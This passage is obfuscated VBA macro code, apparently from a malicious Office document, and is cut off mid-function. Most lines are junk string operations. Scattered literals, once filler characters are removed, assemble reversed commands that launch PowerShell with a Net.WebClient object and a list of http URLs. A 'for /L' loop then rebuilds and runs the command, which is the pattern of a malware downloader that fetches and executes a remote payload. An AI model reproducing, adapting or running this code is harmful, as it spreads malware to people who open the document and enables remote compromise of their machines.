ZbQdC(1) = Mid(OHKJOUXbofiz + VLwuFKooTSQWbNkDGaPOkJ + zPjmOJc, 685, 425) + Left(wrtdTqqwwv + WztGaFzLkCJrEjDHusnoMNzwXtLFFjhN + CCiYwktiBG, 290) + MidB(qEDViiIhtcIaR + DHorriFsNTCCuiqhNGUNwihnIZ + iLwitRXTElMpCj, 620, 259) + Mid(lbMLEwBupMJv + rUYrwzSYJCjoMKSwTnulTGAczcLJ + tziIpODPNSSIV, 150, 795)
   Dim tzwiCX(2)
tzwiCX(0) = Left(VjIzzflqlhTNQ + PjYwXKhhIdkHDSiaHQibYPP + AvJTnmiuiYNdoz, 418) + Right(udmTDwDqzu + zjIqjjqzzVUYAwSRMkCUljdzwGd + BlfpEmFTiqMzH, 357) + Mid(CGtjdVX + XKGiutjIimUGsJNuqWdNiuuzjHN + iahcwkkzf, 787, 567) + Left(ivNkSjnd + twYoztzBRmXmjhONwwzOZLwmzohskb + favkDinMNlvPB, 59)
tzwiCX(1) = Mid(qjvKuiwcB + MjtnLzYBoRLtctAnQjkwkOfXtwbSj + acTzkRdBPBfn, 369, 324) + Right(KMSWBcVrjfaf + wcwsTKhqRHuUMWQmOQFRaiw + OFrwwDDCraz, 916)
End Function
Function cmuXa()
Dim jQFZWG(2)
jQFZWG(0) = MidB(UiCkhPnncs + mEqNKcAGADwJhhXlIrszb + ziocmzdvvbZs, 287, 884) + MidB(STiEazhcFFGw + HPjccVliOEUOlGpIrCJadHAzLWjsjlBT + mRkwoEaj, 243, 265)
jQFZWG(1) = MidB(QzPuATdTIVcYZ + LndjmcjVaRNlVqumVUdmkipqARoMWj + wjdpPjbod, 756, 657) + Right(RaqCFCzhBsBwlj + EqFCGuKIjFWIIzzksiqziZhurbsdD + ZzcCrXP, 655) + MidB(fpstuBL + NouYbdZATjnbTljAXhALaPwjoBwZjjF + iYAZSXwB, 669, 469) + MidB(EJuidtm + HHctkwWGGsbaFbWIiNEtnfjrCvCqS + XRXjhYZubjwci, 88, 352)
   Dim APGHIV(2)
APGHIV(0) = Left(TsqvsKWJU + bZaIwRJYlJqNvLbqzGunXF + KsURcsvt, 148) + Left(IqwBujK + zTtLiiEzhmDrJzbEwSCQrESAAEA + EiHqwJiw, 775) + Right(VWCQhzaq + CJzDCGPdDujqzNBIcuKWqvUBBTBiJu + UKnwCTV, 715) + Right(pjDDfqzvazs + HhENKBQlHzsqUSMYULGozwnKjN + IiEfPwFKjlHD, 473)
APGHIV(1) = Right(oVREHlTS + sGOXqjKWpKmpQBpjDDPrn + PJMAoPJfWrqmt, 47) + MidB(CQACjAKvjijq + ObYBTAEWAucuCVPvQNanwIO + RJjShtcPO, 847, 665)
kizhOuJvj = "_/^X_\/^8^" + "_/^\b-" + "/" + "_D/^_\5^_-^\/" + "^-_^\" + "s^\^"
Dim zILCO(2)
zILCO(0) = Right(BGULEBwEn + wbBPETcMCFnknhjTUCiSfRFjXiA + WHJuJjEsaBzMw, 370) + MidB(XVdrLNIQJV + jEipiOQcdmWjIjBiFjwWLAjfJzskomGJ + JihCHukwt, 662, 532) + Left(iDlwcXDZ + iHdkCiwCaZhYXBORQKdwDqjCoilRur + vdJhQzjBtZJjjC, 256) + MidB(OpwfQlZWjIYpH + mDAlIjtfSCzTASlQfBmTfsjLkoIL + btjBbzDUJjcS, 340, 467)
zILCO(1) = MidB(WHJcHjAjV + XJrKqLhaHlohaKrFrLpWSACIdvsz + YfLSWlHjwObm, 350, 539) + Left(ousISNimZJoCEi + DFIuzYjFFqMbviaGjHzFLzZtNwEfT + iMTHwPLmDbAG, 826) + Right(OvXXQjjozza + JALtbIwWGzrlTTpKrmiJIwjD + VJYkqdCPHf, 658) + MidB(HvpjiQM + GsfiarDzrFuzlKHvpQZCLiaNSQFm + iDjEHCLMKo, 553, 48)
ihsmcta = "-_^e_^-/m_^-/" + "^e^\/^-h" + "^-\_^t" + "_-//^-^_^\^" + "t_/^-n^_-/" + "e/-^_" + "^t^\/-n/-" + "_o_^-\c_/^\" + "--^\/p" + "_\/" + "^w" + "\^"
Dim NYEVOH(1)
NYEVOH(0) = Left(wwBTwkcmIVuwK + AzXdKMnnYrkVijZwEbmPwUHf + GNorXDW, 817) + MidB(dKDOuHzHIZ + iORZOjaICWphKDtwjDtStYXUp + XrJsfaZ, 944, 787)
   Dim fYiav(1)
fYiav(0) = Left(usczAikhmSEa + dConFNsXWAdEnrWMtJncHBhcdBKziTT + umqMsXVbVw, 433) + MidB(QGLbEcqZjlYkO + DzknlVbZmFmSBKinlDmC + LwOARbdBIYWLi, 224, 394) + Mid(HpwqXYujNGbk + zVwaYNYlLkJcPtcTWfNQBnXTUEVCRz + qmlvbIViWF, 267, 915) + Right(lmHnmlkFvnAt + paTKVqDpiXVNjtwZcTiuiMWokqwui + ovlDaoivEkSZb, 24)
   Dim UTwoO(2)
UTwoO(0) = MidB(EGIhLMKpvXBq + nCJffofcTBlaiZWFJqPspfzhpiCvwY + QnJisDbmGvls, 549, 303) + MidB(rzdzYKUzi + wRGnCoBIjwbwhcltuEEkDwufIGSJ + NcUzIjDbGqVQ, 33, 926)
UTwoO(1) = Right(YaFiCQthCpHJsC + cNThIllKAdSOnwwqNhVizjnzT + iEaioocHnmoudY, 947) + MidB(PsJSfUXiG + zUoSjGuOojIVjZuEJrEVhaSbD + AhKGJSw, 426, 226) + MidB(iqmQjnjFaTY + VtzHrQirflSwOaHwhfROjRrisz + bRplQTrivsnD, 95, 125) + MidB(YIwilbwpEiQp + mtWCEAJdKnFDasOJcGjzfzAU + lDBiJGthCCzc, 909, 967)
GMQXQRj = "-//-/^\m\^-_" + "^o" + "^_" + "-/c\" + "/^_._^" + "-/a/^" + "-_" + "g/^_^-i" + "\/^-m\/-a^_"
Dim YVzpVn(1)
YVzpVn(0) = MidB(fDurEDfJwZkDYs + jGaVcKkoGPbzCrPijiCzwRSzZaVJfBwJOM + USFkpcjHE, 175, 400) + Mid(ORzqJcDJLLOkF + DiBCdQJktFHVkLQFwTQjzSzIIGrAkjiEWH + ZEhFlBGSwRvJom, 595, 282)
jANMdNwja = "^-" + "/^i^_-^" + "\v^\_/o\" + "^-^_r\^" + "-" + "/p_^-/o^_"
Dim zfmTSa(1)
zfmTSa(0) = MidB(BjXUojq + sLwisVjSwVNzrHfwpVOHdiKiWDvsFsjPzbC + CBTEuIJo, 294, 775) + Mid(UnjPDwzimNODcI + iIEukMLGDDZAuDwkEzAwcC + pmQcmDwJGj, 950, 185) + Left(cGAvahsFwAd + OiLcsOpUsaRWCjFobcUt + bpijnPwODjfv, 146) + Left(TFINZdEiIFSupw + kPuQZLnjdbCSSFYAtHjWDXKViU + SiqufNoV, 159)
   Dim SfHBdC(2)
SfHBdC(0) = Left(pCHXInBuMB + DdiKrLhMzBUAKzPRDjdQQrtm + rSNKisoAzKSUs, 501) + Right(GQzolcIwqBaN + zYMZFiGpYKOTtmhcikdohB + QTjSbmfM, 882)
SfHBdC(1) = Right(UFaRrfdWIO + OXkfhUjiqYqVszojsZTjXHTlJ + GvGKSurHzsK, 581) + MidB(hkvzjtuTiRj + MXOiaaskcjLZEUrnhuWFqmcKkmNobXG + iKkEDtEAkZbB, 497, 544) + Mid(oYiWArwzPIzP + CwNlJdzqSMlWMBJKKSFmHjrNmovvoF + dnoSQmzFWl, 572, 80) + Left(FwnwqzEZGCSQKB + zRmpXVVrCotCWFnjzIrPDSDhmAAb + FnMRtYkcvuXI, 207)
   Dim kzblMC(2)
kzblMC(0) = Right(tvoBjEsqsPpJLI + ncKZLMYzElwYmwTiaaNJqmWvGTJQcf + jrZjhXozvITOGR, 421) + Right(hEGKSUnoRRjv + tkpObErtqoOiTIppzubkmRXmuQFI + oadRCuatnNR, 594) + Right(TjccjQqYRACw + wdljdousimCElHNNlSNocYl + IdOGqIwKc, 722) + MidB(rbCEqjMER + vjSwipIHsEikJfMvohGztrLkmrYfz + TXXJNVTiILMrBu, 204, 392)
kzblMC(1) = Right(USAolZHXE + UYhfEqIolbRDwmjAbXGPdlvilwCqQ + nmfLzEBff, 797) + Left(zqzsHNP + NJDuJLXqjkLUozAoMlaZkkwomGucBCW + cRnsiowFhhI, 625) + Mid(TAdUznkSJKXkk + KRSjXYWYvDiUDCpHbbXhWnsJH + uEHzWPqwbS, 931, 543) + Right(wIPPHVPzVN + jwwfPPvXAwWXjzKLvfzmictAHFziuR + uzwDhjNYwms, 665)
IiuFC = "/^-l" + "^-_/" + "u/^" + "\^-c^\/^-r_-^" + "\i^-\_c^\_"
Dim zEioSq(1)
zEioSq(0) = Left(BOZjvvmHSSB + zaIrDWbiEHhhbmViZpbXwmpV + jHvzPziZzP, 376) + MidB(wcRwNUzmnUrvbW + EOAjKYdLSbIvhiqiuhnbBslsmECnd + sASvjYzFO, 898, 855)
   Dim lZijA(1)
lZijA(0) = Left(SCVOoSDPbF + ELPszSYbrjLjlAMkjEXhth + vViKmlNRtWjkN, 536) + MidB(aSKiCRrGPVNBhi + iadNshwZTGpccWcGaWkpdd + RXMkPBVFnwiCtW, 712, 303) + Left(CinwGoEY + ukzkRmfBGiroGjIiZMEGTbwITQXfr + LCwtlHrjJAS, 260) + Right(PwGiLpDZi + UdLkjCAhLjJooFNFANYrESQ + RclXSkRdfwa, 955)
   Dim GmABfr(1)
GmABfr(0) = MidB(QnzqZfrHifz + oiYwMFvcZjJulAEATnbNTEJtHwjP + LREbCTlM, 998, 827) + MidB(oitrChWLMrNUE + MnitQOrUwczoAGGdPfzQvwsizT + WIRZZVzpazvZ, 900, 500) + Left(LGDdNaiXMWiv + uPQMFoXahRnDSjaVVXrQaVwiu + nBRvDjI, 654) + MidB(LkYlqwXMnmBMjN + zqrJKcNilzIODRTwmSikY + GaBaVDmAj, 356, 819)
khqRckQr = "-" + "//^" + "_^\/^-^\/^:" + "^_\^-p" + "^_/^\t-/_^t" + "^-^_\h\^_/^@^" + "_^\/h-^\/" + "^P\^-/^g/^" + "-\j^\/-^" + "E/^-^_/\^_-^" + "m^\^_-"
Dim woTOif(1)
woTOif(0) = Left(DwzmGCruQj + oYJaPTNmvwDjjNljEswVfuUHU + LabXrafszOR, 268) + Left(BtGZpGNw + RsCifuMsjkVcJpnSCmibOdBOhfzM + NGzXANEC, 474)
   Dim XtHEzP(2)
XtHEzP(0) = MidB(UNLNPVkVFSls + dDQvVOWzzqjQYXfbIUoPHoRQL + ZrMkPDoBui, 257, 404) + Mid(dzFLwarcXA + oIHDwLmZRrDfIqaOlIlipLENmjwUMDaOj + kBiqDmvaDijRO, 729, 827) + MidB(udSrtwAsU + biFJjXAHDhqrtBjCPiiVTCazqDiz + DwUZakrkk, 841, 702) + Right(ZFsOzdmoWSal + XKDUjGcnjJciqzlOQBtwokUza + unTiTajWBwJ, 678)
XtHEzP(1) = Right(FVzvrlBC + EiLOkPICIImWJXWEuWQHSjOUCivdsQcap + mlpGaJZiM, 994) + Mid(hHfGilDYiW + UNitFjYilHkbBNBBViNOWM + pmqoQrilNffdjb, 800, 275) + MidB(uijtlKdUZcHzIh + jwQzrtsPimiXtowSWSvAfLvSGiO + ivrtwwHBmRPwcF, 978, 603) + Left(jlOOXnvk + bmkQPjoaCvATORwjBDFzmSkjUXEzNNMZzj + tQYdsHNXzUbH, 882)
   Dim WfRwkC(2)
WfRwkC(0) = Right(fObmQoAijiN + XLPDpPEaANzjszzdwmhwlTi + iYXLAiw, 394) + Left(umvARNNokwDuO + iaqOijHfEspczwtdiqCmPiXi + wnKqbRHIFXJnH, 823)
WfRwkC(1) = MidB(lLrlCZMqitj + jGEJrHEfmbjkXKOPjLiMnMkXaTLikTiYQ + PiDzzkLvSCC, 547, 287) + Mid(KmjuRzGkdL + vXBwtIlTcaqzbQSUYrwXwpWojIwZ + rQXRDITcrr, 686, 925) + Mid(ojoQFUdVi + JXUFKiAYkMtBXUjYZADDz + hURvVlJMul, 979, 448) + Left(irNicnnz + JpFpEFUVFpwjndajpWiYMqIqUWMhiiTmjf + oQdRrQBE, 693)
aLzohT = "o/^_^\" + "c^-/_.^_^\/x^" + "-/^_^u/\" + "-n_/-i/^\-" + "l^\/_m-^_^\^" + "o" + "/-^_/^" + "\" + "/^-/-\_^:" + "/^_^\^p^\^-"
cmuXa = kizhOuJvj + ihsmcta + GMQXQRj + jANMdNwja + IiuFC + khqRckQr + aLzohT
   Dim zjNmQ(1)
zjNmQ(0) = Mid(cidSvEwjWOKO + DLnztbTNkwMnAwVSaLnaDZlMIHTKwi + UZpXaSOtfFHDXm, 7, 923) + Mid(bcYkkXI + FQoOJiibcDlVwkvwpVHXZwCpVkpR + GJdqrwUt, 217, 80)
   Dim wcLYM(2)
wcLYM(0) = MidB(zwPzzsINCTqivQ + NufIwoEGBUJiTvZqlZRiYiCzk + GmQuzdhhzKrI, 956, 584) + Mid(HiYRrJwWIv + atoUNQOSMVRsJTQTApIuR + twqulBNbHDW, 449, 921) + Right(NHvMHZhVm + cQRRzXHkXRfYaDQCkmwkbBzEECMaDst + JpEwPLKwhjUsDI, 587) + Mid(FXpjpPz + hKrcfhuHNfohluSiLBuhpDm + QUaEfMdzHEDn, 949, 929)
wcLYM(1) = MidB(FLYOMuuzV + ndBYtLKnnaIUjdiqOFuQjrOG + ZcjYKpVFfJ, 533, 744) + MidB(iiDDijPEh + wtNShfEnUNKrkqHZKFzjlEoKYoGUv + OwInwiWzlzU, 758, 354) + Mid(bqucPRzMbNsVj + tPmFvtzmLscNhRRWMPaSpORkjZFI + XGFBMww, 538, 85) + Right(WojfKwW + mzTwwrdJSMFSBcaMQJSikLTZiFWdjEr + nIEVVpJrdhU, 244)
   Dim QGjoom(1)
QGjoom(0) = Mid(ZqwsORGtJrH + ZOnHFGUMwKDEswJjvCMnKkcZrbjTz + qrshjfkOdjvoV, 728, 187) + MidB(wEzAnzcWchc + qGvApEQzXcZIkGniqGXsKrCuQKG + dQppsVwE, 392, 557) + Left(VbfNNZWuuuFS + ImKzoEZTvruZlqdWdoQXjDlkD + KXcGMKuUofGC, 600) + MidB(nVkDRXcfA + OiwDUVFMjXzzZjBpHFmlPQzAwLirb + wPXkLlwSGv, 816, 449)
End Function
Function IOvrzqKGE()
Dim jwFbG(1)
jwFbG(0) = Left(UihqXMStzQN + NpvJtrdvmGAuErhoClVcQdUCRhDq + JwrAviO, 382) + Left(napdHaLKNatf + ijYpLNjAilIAjtUZLoqnqurVscwHiE + PJYITwnrqs, 977)
   Dim WmXvKG(1)
WmXvKG(0) = Left(hnUVJBwfV + jTdFwUqiSYsodwUjzNSzqwrPnQ + VjHnOshba, 387) + MidB(wIujsuMCLonqQT + FECCWBDJpzwOsFfBhCLXsEFFj + WvFYWWRlc, 936, 95) + MidB(CvQnSjIQwSFGuj + QwXNQSEqpWjOprcQLUzmwnAacASc + nMAhXikq, 502, 946) + Mid(ubFNcpi + KzKaaPsbWttHBfEvkGNVpwtZUOY + dtcOqGzTrPjaDG, 737, 488)
   Dim RtAhaD(2)
RtAhaD(0) = MidB(sivUsqXkrHEWK + BDlpAwzwRqbizaDAWbdoaIQHwkuC + izdoNYqvjzCCO, 783, 742) + Right(DSdHkXP + kqwNBOVnAzwPfqardlYVjhqkrfwcOd + AwVwojbooVoRm, 751) + MidB(tdmnIVSjKdiHC + lFrqdWfzrSnjtZwEwkrtffipnKCTl + CLvzDWOjuUVoG, 737, 717) + Mid(IwnzuMLKwjs + zBNYrOCHvjUEwJqXDCipfqIwjmE + sFVUbivWdT, 262, 247)
RtAhaD(1) = MidB(wnBUadqJNpMih + SUquwLqDppHfBIwzJKiRdLf + jHtALHKwXSUjH, 705, 225) + Right(VKHFskWkZEkD + SbzWiVovXqKZqQCaWpUbmnXXQmCZuK + EINdkzZ, 753)
zIIwzKw = "/^t^_\/^t^-/" + "^\^h/^_" + "^\'/\-^=^\^_" + "-" + "^M^_^-/^H\-" + "/C^_" + "-/$^_/\;_^" + "\/t^_^\/n" + "^\^_/e" + "/\-^i/^-"
Dim wpUMiB(1)
wpUMiB(0) = MidB(BGGojuhfikp + DSjvJKsQIdaRNFYhAmpABicHkQQzbvq + oRZqKKsdfX, 413, 785) + Left(BkDvuCkG + CIAsdzVXLIkPviqIFtKiJPOXzvsm + soCJAzf, 36)
   Dim Djhva(2)
Djhva(0) = MidB(QLHmYPbG + dVJIsnNiqqLQdMtVHsYfl + VFScMPQpmCSvL, 930, 390) + Mid(iWFudZN + kjUFpYaESIQsbubrKsFnjSzPdtrfF + ijVhNuUGdMw, 263, 91) + MidB(TmPUJzLt + rIwKacKiwwKGzwkbvEtUTaFQkEiSq + VlYvDjliFwzMcS, 424, 472) + Left(SEiwodkVM + UdUYObMMfrrVnVTNczOCYdMXzuL + MIlVioOqJL, 846)
Djhva(1) = Mid(GMKSKWsOKvN + vCEPSUKUlNBAoZHFTOdzMikpoIBNYuisLm + XOFUzJSVwiHFbw, 955, 974) + MidB(rliiVLj + GGjCUMaqPrCDMPsKlZwjUJvHLtstkz + OPbmsBHi, 133, 418)
   Dim afTXi(1)
afTXi(0) = Right(UtwAMjKwXJVRP + oMtMtZuPhKrzrzPYLpEEviSmaQSzfD + HdSUTaiQpUONG, 505) + MidB(FOZlkHwhanTzPK + wBpmGqiOLPbQEjzWVdNFzfkufH + iIzPEkI, 812, 295) + Mid(azsXRVGT + QvnlvqGVwCHfmkSpbPOfSmIHITYZnCHN + iJuBUTcE, 896, 212) + MidB(wffEOOm + wmiwCXdTdiGILSVNINrzzDVs + ntbCpfWLCRvz, 699, 328)
   Dim tWlKIQ(1)
tWlKIQ(0) = Right(iNCajardPcVbS + KiHcjIFIIpomdjrzIUBREc + kDfVLYTabA, 767) + Mid(YzuRulEzKMmj + iJRCANlVJniQTCdONjUHzJqOXZ + lrLkRKwnJzDpR, 587, 316) + MidB(zhzrPFdOBRtJ + vSjBmFikSHLOjipVdastBWlhWQtF + mHXhddPD, 248, 272) + MidB(DrzjLvznVnCZ + BXLUZLiBbZHrPGaNRTtknEzF + wEwzzcsrsoVFC, 307, 456)
HFirioLuMmV = "_l-" + "/^_C" + "^\_/^b" + "_/" + "^\e^_^-/W" + "\-/." + "/^_\^t\/-^" + "e^_^\-N" + "\/^_ -" + "\/^t/_^\c^" + "_^\/e"
Dim YYUIj(1)
YYUIj(0) = Mid(hVEudzd + iJwWzMDaSJQwpWOVWuVDdRZpbupSHl + TQAILUtpW, 677, 42) + MidB(hfIajIqSoUEY + jdqJNnXCzUOAJVwuPiPhsXdMwfwvkosN + aoELiinMAHj, 944, 809)
   Dim JiXKZ(2)
JiXKZ(0) = Left(IFWhUciXv + sECwPrIkTEoUrPocVfppJQzDVh + MXtlqBMSf, 47) + Mid(wEQBqFtzjSRb + tjSomCzBraFYjWVrHqEzvNPn + tFSibIjArPli, 944, 256) + Right(khNcNWzkwYo + bXOaTzMIXwqVFCFYBVdiawUXFimCU + QsWHdPlSMko, 733) + Mid(wiXfwfBwp + waHaluEpqpKRPcPCQzbGJDOXXU + Didfpiraq, 707, 926)
JiXKZ(1) = Mid(mvFQUPwhrCT + zWWWjVNXGAkmkKpGBOXIIGCEfkLjJ + jVDTEbpEfv, 340, 616) + MidB(nrlAFzoaOOP + hmvTibREpmznkasNUZrsafEKhGG + ZKHRkbn, 79, 321)
   Dim SlLKn(2)
SlLKn(0) = Left(KWMtZEO + zRAXAAdiODSNcwGGijjzkcBsD + onJLIDBQZ, 361) + MidB(wjilwuNnSVV + OUQvwIZABPwIBuEqJZzNFqFzpvuSRUWu + UaKiduTicuaS, 658, 548)
SlLKn(1) = MidB(qmbGLEsKkEGzfo + LTViPRasuXLXXMSFjScZPiAwYoV + OAGOGdjZMjMnq, 640, 739) + MidB(orKKvHjuFAOSB + VawXQwLcoEjPlZANzirdStXUBdS + foSQkPvt, 565, 302)
   Dim qRiRww(2)
qRiRww(0) = MidB(aaXBZiuIwJSU + uPhtjXVfzpVtWKwQEdlHjOhFwjoXF + XTkCROOv, 519, 666) + Right(kYwAskfVA + AfwRWvLRqhzrMNphKYAvzhAjv + tMOLjXTzrzP, 338)
qRiRww(1) = Mid(DYGoiTEjSwj + BjWMQdqzUljczdziuGlStvQUVNtP + nRNVnzoZfina, 231, 772) + MidB(ikDcNRHacRz + kbVEsDfQbuSMnLVSjciJMzWVKntWzfEu + WTkqKGpIK, 28, 579)
thAGVjjO = "^_^-/^j^\^-_^" + "b/\^-o-_^\^-_" + "\^-^w/^\-e" + "-_" + "/n-_/=\_" + "/^b/\^-^K\/^" + "_^f_" + "/^\$\/_ ^\" + "/_^"
Dim wDRNN(2)
wDRNN(0) = Left(WpKqqtU + RkzjwiXcdJlDWDwccmzTXFSOPURX + OmjdOIPjpjEaP, 365) + Right(swGrLmT + ddTIHMlswpkVfiMwzwpzwJcVRX + SPCkfvXhXTi, 330) + Right(iXQbfPpGCdod + frTUWORHSuzRYPuOYWOaEEMmMNZwBYZCjzO + RbFWbOraP, 143) + Mid(HJYamibKc + szwszMKvAdHzzzNiVLzFKPAbtVmknMjMYdV + FMOlzLZbE, 312, 946)
wDRNN(1) = Left(HoiRDdwlQ + tUkSnJkIcrtvuuDbApuWFsdH + ubpmBsfbHnvjo, 242) + MidB(umWJaWlcU + ziZJCKQiWCHuCPUMtZBiFrlQRXqMRdthwhd + XiuNnsTtzB, 469, 675) + Right(QsobSRtzKj + RJifnjADdEKcKRXTVRdWGIFKbbYTOYzbJK + pirtMiMQT, 988) + Right(oOLTLjtWhYY + lwDNXHMHcuiMvorcFtiz + PdRvjQJPnbl, 171)
SDAoXW = "l/\_l_-^\e^" + "\/-" + "^h^_" + "\/s^\/^-r/^_" + "-^" + "e^_^\^-^w^" + "_\^-^o\/_^p&&" + "^f^or"
Dim YVOAM(1)
YVOAM(0) = MidB(XYjOupoH + CZDlsIZjLjGlvbSwwnrjLzqsdOzYmvE + vifNpRA, 666, 95) + Left(lnbsrUcqKpsnC + VMKUqjDXXOQaKXBGLDHpnGTOhODudzs + YkvGiPDibtRSU, 775)
   Dim KdhlQp(2)
KdhlQp(0) = Right(nbshwWMHz + HivFaMlOZoVmvkvPwNvMiUojMtbU + TnMOYGZfa, 481) + MidB(oGmMbwKjw + SRkmdYVzUjVSHjqpnPNMfhwARiJEVXz + nUwHFbGlToiovG, 400, 920)
KdhlQp(1) = MidB(zhFFFjYDSLbz + diCVrIIRaMtRLWYopAMsiPQ + JvJTtVL, 252, 70) + Right(XZjDitL + htWSLFIQUFbZGHiQwAJVpEQQUINpDB + PZrIoMuXju, 562)
   Dim NultV(1)
NultV(0) = MidB(pzUoHBnHPXBEmP + DcJAibENiTdtbtFqHiNp + LIMBksld, 806, 663) + MidB(rVOtFaci + nWwKhYcapwpSSrNcmDtktCjcOZnNcAw + EaLNBPtdMBCvB, 831, 956) + Left(LLtlCHw + BCZWoWzBJbUznAAjhNhpWbokbE + NRnOqDqNj, 959) + Mid(vPjNXtiVHROA + DuAlWwGjCJZJDqjNztHvb + ZjLvCmudAvNu, 531, 60)
   Dim zIGhFd(1)
zIGhFd(0) = MidB(SWIUTndRbC + PwYajcFYCvaRSioiuiZoMGjK + zrRLQNCjj, 964, 565) + Mid(UWJiDBIofNU + qHMTASRHCDvOBbEGPEERDYfIf + iwccXuXMzL, 125, 444) + Left(NUCwjjYzQ + lqJvUJmfhZwmhhjtStnzpDdMwswhjQ + EORcBUrjtPhd, 287) + Right(iiWwCzr + rznmlrRVivcScrvoDFaVzpRCKUqnNualEjF + zMzTXkC, 789)
omRwcRt = " /^L %C ^in (" + "^1^6^3^9;" + "-4^;3)^do ^s^" + "et" + " -" + "^{=!" + "-^{" + "!!" + "^*`^}^#:" + "~%C,1!&" + "&^" + "i^f %C ^" + "e^q^u"
Dim dDwkb(1)
dDwkb(0) = Mid(QfnTTvwZYo + YSzXifCuaFKYhFSzzCriXwbK + nWnfBnjdjTEZkt, 210, 466) + Right(lpjBJrZXjncYDU + mjUiWuWoqvsXSzwVfZPQvFiGwAIP + mGbDzZqSrLN, 969)
uVZjDSJq = " ^3 c^al^l %-" + "^{:^~^-4" + "^1^0%" + CStr(Chr(5 + 5 + 1 + 3 + 20)) + ""
IOvrzqKGE = zIIwzKw + HFirioLuMmV + thAGVjjO + SDAoXW + omRwcRt + uVZjDSJq
   Dim dDPsoc(2)
dDPsoc(0) = Mid(LqIsJjuX + AYQUmiuiLCakjCAIwicTWHvmoXCjjjkR + IRkzJRBjaKK, 810, 166) + MidB(tJVdVlNqsGHISq + fqWzjtfJFAwjlcOanqXOnqbsqBIjqWOizmcP + LYUmjEQIthf, 8, 629)
dDPsoc(1) = MidB(AcEFAoHwRIJXz + wXqtCPVGOWcIaDpphmXKwpEbDi + SKRjHJnicfWp, 668, 470) + MidB(VNSTpLzSaNsDwo + rpKXrrwjCDKnibaiFMCrHKwItRjfoN + tOjHdRlRmBjism, 346, 406) + MidB(dPozCNtjCOSX + sjhLzwbalFGdTzOmFjfJv + OuOWzPfamI, 95, 119) + Left(HFoDswjZTwPDkQ + ZlAdjhIDmaDhGBttrrGDOmoaSHvi + ZjTFsLZ, 938)
   Dim CsFis(2)
CsFis(0) = MidB(HLwMpEEboS + ajDTtSbJEZGzKuuKpwlrvmNquw + TJPNizYLMR, 143, 265) + Left(pOirPjtHvDop + jbhZYfFzhwfpjwYpXowMChDfMNMYsrri + hoWjshhLaLKJ, 444)
CsFis(1) = MidB(AzjiPisUA + VXmwiENoHiScQirHsqzHsrHw + oTWmJLK, 490, 531) + MidB(viGiiWf + nlcfqsXQuGWIiTOvpvETMOHIqYJVcik + rqwQotf, 407, 183)
   Dim TdDYvh(1)
TdDYvh(0) = MidB(WYYrnao + IvfrsvVFiwYwzDZXdWovFGEfaiDsDii + ZraihSMk, 153, 503) + Right(VSQzRcoUzak + vXfEVwQHwfCnYZbLzEFPmvlBtVHzH + mujjmdGTZ, 351)
   Dim wDqWK(2)
wDqWK(0) = Left(UfMzSBYSuuvm + qLqwAkDkmRbhjjPVjbNhIBGCoG + ncuIszZJjijnZh, 833) + MidB(ifYEPdjcdhvth + qsiwnbrQwhqrZIbJGbcqYzNfP + QzQFzjDthMr, 286, 552) + Left(boDUGmGSHC + GzZvcwSrlmbbYBPMATzX + uLrJjICkdzt, 152) + MidB(QKEhqCbsi + RsqNiGbSimaILckaWzkAvpPShXBBd + OQLXvqSH, 979, 631)
wDqWK(1) = Mid(wWNRjvHwDjsu + otcQjJEAwMUCkEplFSvTFSGVX + YRAbBYfiAUfw, 501, 30) + Mid(sWuNvYcRA + XwanhvNnHUifKDTwZSLCOwcrmzo + IwHjZjwAMNm, 914, 322)
   Dim CVfrN(2)
CVfrN(0) = Right(KtSsVSilrv + wqLMAIXinBjYhpAsGwllkvLDQkTA + GoaqJfjpL, 669) + Mid(uLPdhtkw + LEaRpEHwTQFaROaNXMCcYBznnD + SZodVQsqi, 667, 258)
CVfrN(1) = Mid(wpkzOXJJ + FJcCPpRUutwfmosuroznTbMPqYfQG + jUtNcBN, 283, 357) + MidB(wKwIVdSZCj + IbDabvPciRCUzjPiVRvdBQhCCwjiX + kmYbmTDtuhjvoW, 933, 60) + Right(GYENwBJtsMdw + ZWPuqHidXBvSjFvpzQEtWoWRs + QvufWRHCMjwzv, 648) + MidB(joAMGhI + UdsGTpqjmGFAmbZDjFwQJmndrOkin + CoOvtuITIbHBw, 811, 495)
   Dim znUnh(2)
znUnh(0) = MidB(RVGPRikj + ludHQQWEtfQaKCQEIDEtSTzwbZNfHCvk + vjXzioDvrj, 927, 252) + MidB(bdmNzBLoSTv + AJXranwIZjHzpWcNAOYdPhmNIH + CDIDmTs, 425, 485) + MidB(CzfZzLpLFT + wwfIJnZBIcEkqlkipUNBjkIpC + LjWzMHGLiizQUt, 389, 511) + MidB(ZEDjpqlj + YBwXTGztimiidzvqDtIMJcOsbufMcNHnh + wNvbrCcvaFz, 887, 10)
znUnh(1) = Left(mmOiQvFNWwDaB + KELOGfMlRQjnmdzmaUYzTjrzZc + aiEvsjlbKZB, 938) + MidB(ORbswYvP + lFriOfndpfCjQtDbBSbhJRaY + PfLoBKmrDMf, 734, 854) + Left(fMhjGifsnok + hQoGFjOJTOhwZqqwPFiFspavk + zRAOKmYYjM, 95) + MidB(wzCIJpCq + ASDLvRfkVvPRjjPXiNDmSHtm + ulhZHAwGacHB, 528, 514)
End Function

Function GAoJrGUCDZs(KmkpRUzAZiC As String)
   Dim EzQiH(1)
EzQiH(0) = MidB(YmZLmtb + jDAwPzrNiMEVjdnYPWWDRWIUFt + iFSjcIwwEGDvuw, 286, 70) + Mid(XOdEbIizjcGflU + WhCwAfbRSSJJUHFVhUddJFc + rZUiJjajAK, 905, 843) + MidB(mLqUqOVB + wFusEtqYGGZvjAduaEDuHrRTkmKzqG + ElhcGTWljntQ, 131, 387) + Mid(uwPNVKnBma + wHimDzwrMzzjsNTzBMQYurfPtwj + NkoYFGNHYVH, 947, 971)
   Dim SUJUo(2)
SUJUo(0) = Right(uKhSJROZhlO + zsGovvkhdjDdMUArqBXDzGLtQ + dCKaMaOV, 480) + MidB(EMhwPfEtDDlXc + pGijCTlWzjsAuHIbwKVBqfo + IrfiXmkHnprV, 366, 809)
SUJUo(1) = MidB(WcEzwuKZb + TErENwANIKjOJzFidUokUDkYpO + GQXRDwk, 578, 490) + Right(ZPMvqpwYXUw + iUXBdXKwavDQrsZBbFKsPUtitqJlJm + iZjABIiwUJfz, 953)
   Dim WsrTCP(2)
WsrTCP(0) = MidB(tjoQIQJtd + NzSbDBNAzbulttSTaXjJpRMrVi + CksmzERoR, 777, 964) + Left(SoDXRcQaJ + iqcJqKsiphYKGqjbiBlZXcJUDFtpswJII + zHwPJkti, 203)
